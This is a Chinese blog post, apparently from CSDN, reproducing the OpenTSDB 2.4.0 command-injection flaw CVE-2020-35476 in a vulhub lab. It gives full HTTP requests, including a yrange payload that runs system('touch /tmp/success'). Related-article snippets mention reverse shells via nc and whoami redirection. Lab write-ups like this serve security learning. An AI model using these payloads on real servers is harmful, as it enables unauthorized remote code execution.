vulhub漏洞复现50_OpenTSDB

最新推荐文章于 2022-09-21 22:32:13 发布
最新推荐文章于 2022-09-21 22:32:13 发布
阅读量1k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122870470
版权

安全 web安全

CVE-2020-35476_OpenTSDB 命令注入漏洞

漏洞详情

OpenTSDB是一款基于Hbase的、分布式的、可伸缩的时间序列数据库。在其2.4.0版本及之前,存在一处命令注入漏洞。

漏洞环境

靶场:192.168.4.10_ubuntu

执行如下命令启动一个OpenTSDB 2.4.0:

#docker-compose up -d

服务启动后,访问`http://your-ip:4242`即可看到OpenTSDB的Web接口。

 

漏洞复现

利用这个漏洞需要知道一个metric的名字,我们可以通过`http://your-ip:4242/api/suggest?type=metrics&q=&max=10`查看metric列表:

 我们这里的metrics是空的。

好在当前OpenTSDB开启了自动创建metric功能(`tsd.core.auto_create_metrics = true`),所以我们可以使用如下API创建一个名为`sys.cpu.nice`的metric并添加一条记录:

```

POST /api/put/ HTTP/1.1

Host: your-ip:4242

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Connection: close

Content-Length: 150

{

    "metric": "sys.cpu.nice",

    "timestamp": 1346846400,

    "value": 20,

    "tags": {

       "host": "web01",

       "dc": "lga"

    }

}

```

如果目标OpenTSDB存在metric,且不为空,则无需上述步骤。

发送如下数据包,其中参数`m`的值必须包含一个有数据的metric:

```

GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/success%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1

Host: your-ip:4242

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

Connection: close

```

进入容器中可见`touch /tmp/success`已成功执行:

 

 

Revenge_scan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现OpenTSDB 2.4.0 命令注入(CVE-2020-35476)漏洞复现
失心少年
11-26 1364
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!譬如收集大规模集群(包括网络设备、操作系统、应用程序)的监控数据并进行存储,查询。翻译过来就是,基于Hbase的分布式的,可伸缩的时间序列数据库。这一步我未复现成功,可能构造的有问题,大家有兴趣的可以试试。
OpenTSDBCVE-202035476漏洞复现及利用
最新发布
m0_73605862的博客
12-01 1413
2.这里试了很久自己的反弹shell都不成功,然后试了很多次,先是把端口打开了,用ufw添加端口 ufw allow +端口,然后把自己的nc变成了 nc -lvp +端口,然后再sec一次,反弹成功了。1.直接把输出的whoami重定向到1.txt文件里面(中间要用%20作为空格,不然会失败,因为这个卡了好久,看到burpsuite的颜色那里不对了)6.然后进入容器中查看(一定要查看创建的文件路径,其他的包含任何的都不是,因为这个找了好久好久,其实很早就做出来了,还以为做错了,无语死了)。
opentsdb远程代码执行(CVE-2020-35476)
玄道的网安博客
12-19 2113
1漏洞背景 OpenTSDB(Open Time Series Data Base)是基于HBASE构建的分布式、可扩展的时间序列数据库。OpenTSDB可以获取电力行业、化工行业、物联网行业等各类型实时监测、检查与分析设备所采集、产生的时间序列数据,并提供存储、索引以及图形化服务,使其易于访问和可视化。 2 漏洞原理 OpenTSDB 2.4.0及之前版本中存在远程代码执行漏洞,用户提交的yrange参数或其他相关参数的值在/src/tsd/GraphHandler.java文件中进行简单的反引号.
alert不会影响到页面中其他代码执行_OpenTSDB远程代码执行漏洞通告(CVE202035476)
weixin_39759881的博客
01-15 293
漏洞综述漏洞背景OpenTSDB(Open Time Series Data Base)是基于HBASE构建的分布式、可扩展的时间序列数据库。OpenTSDB可以获取电力行业、化工行业、物联网行业等各类型实时监测、检查与分析设备所采集、产生的时间序列数据,并提供存储、索引以及图形化服务,使其易于访问和可视化。近日,新华三攻防实验室监测到网络上出现了OpenTSDB远程代码执行漏洞 (CV...
[CVE-2020-35476] OpenTSDB <=2.4.0 RCE
公众号shadow sock7
12-21 1158
安装 条件: Zookeeper HBase Zookeeper wget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/zookeeper-3.6.2/apache-zookeeper-3.6.2.tar.gz cd conf cp zoo_sample.cfg zoo.cfg vi zoo.cfg # 修改dataDir=data,然后启动 bin/zkServer.sh start HBase opentsdb的后端数据存储依赖于HB
opentsdb-java-sdk:用Java语言封装了openTSDB的http api
05-26
opentsdb-java-sdk 目前实现的功能 查询数据,支持同步和异步 写入数据,支持异步回调 删除数据 查询最新数据 查询metric、tag_key和tag_value,支持auto_complete `源码中CrudTest类提供了一些使用说明和测试,包括并发查询测试和并发写入测试` 快速开始 Maven依赖 <dependency> <groupId>com.github.eulery</groupId> <artifactId>opentsdb-java-sdk</artifactId> <version>1.1.6</version> </dependency> 创建连接 OpenTSDBConfig config = OpenTSDBConfig.address(host, port)
OpenTSDB 2.3 中文文档
07-28
OpenTSDB 2.3 中文文档 OpenTSDB 2.3 中文文档 OpenTSDB 2.3 中文文档
aardvark:OpenTSDB视图
05-13
土豚 可视化工具。 功能简介: Javascript客户端呈现的图表: 折线图 比率表 平均加权图 视界图 散点图 热图图表 自动缩放 堆积图 按值或顶部/底部时间序列过滤 深层连结 基于树的指标选择 ... 在90
基于postman的OpenTSDB HTTP 写入
08-18
#### 一、OpenTSDB简介及写入方式概述 OpenTSDB是一个分布式时序数据库,它被设计用于高效存储和检索时间序列数据,如系统指标、应用性能监控数据等。OpenTSDB支持多种写入数据的方式,包括TelnetPut、CLI Import、...
OpenTSDB 文档
01-26
### OpenTSDB 知识点详解 #### 一、OpenTSDB是什么? OpenTSDB是一种分布式、可扩展的时间序列数据库,其设计目的是为了处理大量来自各种监控系统的数据,例如网络设备、操作系统或应用程序的监控数据。它基于...
8.8 m超大采高综采工作面支架选型应用及顶板管理研究
07-24
针对8.8m 超大采高综采工作面开采强度高、顶板活动剧烈、管理难度大的问题,基于上湾煤矿12402综采工作面的顶板管理技术,对工作面矿压规律进行预测、对工作面支架的选型以及现场顶板安全管理体系进行了阐述分析.结果表明,采用类比法预测工作面回采矿压参数和规律能够满足超大采高工作面应用所需;强制放顶、擦顶移架法、超前拉架法等常规工艺在8.8m 超大采高情况下仍然有效,施工中形成的顶板安全管理体系保障了超大采高工作面的安全高效生产.
HTB-AdmirerToo
qq_53142368的博客
07-12 2095
HTB
OpenSSH 命令注入漏洞(CVE-2020-15778)复现
weixin_47531489的博客
07-20 1万+
1 简介 OpenSSH是SSH(SecureSHell)协议的免费开源实现。OpenSSH是个SSH的软件,linux/unix都用openssh软件提供SSH服务。scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令。 2 漏洞概述 该漏洞编号CVE-2020-15778。OpenSSH的8.3p1及之前版本中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。 漏洞等.
[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
qq_51577576的博客
09-21 1万+
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。 计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅 我也会不定期再中间更新复现文章链接 目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者
[Vulfocus解题系列] 所复现漏洞总结
热门推荐
00勇士王子的博客
07-14 1万+
前言 写[Vulfocus解题系列]也有十天左右了,感觉虽然复现了一些漏洞,但是复现过后对这些漏洞的印象并不深刻,于是就有了写一篇总结篇的想法。把复现过的漏洞介绍、特征什么的总结过来,没事的时候看一看,加深一些印象,别之后别人闻起来某个漏洞,明明复现过,却忘了,那多不好意思。 已复现Vulfocus靶场漏洞 Struts2-052远程代码执行(CVE-2017-9805) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源
openTSDB详解之Stats
说文科技,做有态度的研究。
08-18 1087
openTSDB详解之Stats Stats openTSDB提供许多metrics关于它的性能,通过各种API端可以访问得到。主要的stats是可以访问到的,来自GUI,通过Stats选项卡【如下图1示】,来自于HTTP API /api/stats或者是遗留的API /stats。Telnet风格的API同样支持“stats”命令为了从CLI中拉取数据。【在你喜欢的任何时间间隔里内】这些都...
10大常见的安全漏洞!你知道吗?
wangpeng198688的专栏
03-04 8343
众所周知,黑客入侵、网络攻击以及其他数字化安全漏洞从来都有百害而无一利。一个行业的烦恼可能是另一个行业的噩梦——如果你读过 Veracode 的《软件安全报告声明,卷6》,就会知道大多数安全漏洞在某些特定行业更为频繁。
MS08-067漏洞分析
10-27 3937
 by diyhack 前天看到微软紧急发布了一个漏洞补丁,就去看了下,发现该漏洞影响覆盖面非常广,包括Windows 2000/XP/2003/Vista/2008的各个版本,甚至还包括测试阶段的Windows 7 Pre-Beta,并且漏洞存在于Windows系统默认开启的Server服务当中,而且超越了当年风靡一时的MS06-040漏洞(又想起当年用该漏洞。。。。。。。嘿嘿)。这也难
OpenTSDB之HTTP请求接口、Java开发
zx711166的博客
07-04 8256
HTTP API 由于OpenTSDB没有支持Java的SDK进行调用,所以基于Java开发OpenTSDB的调用将要依靠HTTP请求的方式进行。下面就先介绍下部分HTTP API的特性: 数据写入 /api/put 根据 url 参数的不同,可以选择是否获取详细的信息。 /api/put?summary // 返回失败和成功的个数 { "failed": 0, ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值